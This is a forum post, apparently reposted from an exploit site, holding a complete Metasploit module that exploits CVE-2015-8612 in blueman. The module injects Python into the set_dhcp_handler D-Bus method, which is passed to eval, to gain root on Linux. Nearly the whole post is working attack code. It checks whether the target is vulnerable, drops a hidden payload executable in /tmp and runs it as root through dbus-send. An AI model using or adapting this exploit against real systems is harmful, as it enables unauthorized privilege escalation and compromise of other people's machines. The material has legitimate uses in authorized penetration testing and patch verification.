Jump to content
Fi8sVrs

blueman - set_dhcp_handler D-Bus Privilege Escalation Exploit

Recommended Posts

  • Active Members

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
 
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'blueman set_dhcp_handler D-Bus Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges by exploiting a Python
        code injection vulnerability in blueman versions prior to 2.0.3.
 
        The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
        `set_dhcp_handler` function which uses user input in a call to `eval`,
        without sanitization, resulting in arbitrary code execution as root.
 
        This module has been tested successfully with blueman version 1.23
        on Debian 8 Jessie (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'the grugq', # Discovery and exploit
          'bcoles'     # Metasploit
        ],
      'DisclosureDate' => '2015-12-18',
      'References'     =>
        [
          ['BID', '79688'],
          ['CVE', '2015-8612'],
          ['URL', 'https://twitter.com/thegrugq/status/677809527882813440'],
          ['URL', 'https://github.com/blueman-project/blueman/issues/416'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'],
          ['URL', 'https://www.debian.org/security/2015/dsa-3427'],
          ['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'],
          ['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultTarget'  => 0))
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end
 
  def base_dir
    datastore['WritableDir'].to_s
  end
 
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end
 
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end
 
  def dbus_send(dest:, type:, path:, interface:, contents:)
    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
  end
 
  def check
    unless command_exists? 'dbus-send'
      vprint_error 'dbus-send is not installed. Exploitation will fail.'
      return CheckCode::Safe
    end
    vprint_good 'dbus-send is installed'
 
    res = dbus_send(
      dest: 'org.blueman.Mechanism',
      type: 'method_call',
      path: '/',
      interface: 'org.freedesktop.DBus.Introspectable.Introspect',
      contents: ''
    )
 
    unless res.include? 'EnableNetwork'
      vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available'
      return CheckCode::Safe
    end
    vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available'
 
    res = execute_python('')
    unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
      vprint_error 'Target is not vulnerable'
      return CheckCode::Safe
    end
 
    CheckCode::Vulnerable
  end
 
  def execute_python(code)
    dbus_send(
      dest: 'org.blueman.Mechanism',
      type: 'method_call',
      path: '/',
      interface: 'org.blueman.Mechanism.EnableNetwork',
      contents: "'string:[]' 'string:[]' 'string:#{code}'"
    )
  end
 
  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end
 
    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end
 
    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end
 
    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe
 
    print_status 'Executing payload...'
    res = execute_python "os.system(\"#{payload_path}&\")"
    vprint_line res
 
    unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
      fail_with Failure::NotVulnerable, 'The target is not vulnerable'
    end
 
    if res.include? 'SyntaxError:'
      fail_with Failure::Unknown, 'Payload execution failed due to syntax error'
    end
  end
end
 
#  0day.today [2019-01-17]  # 
  • Upvote 1
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...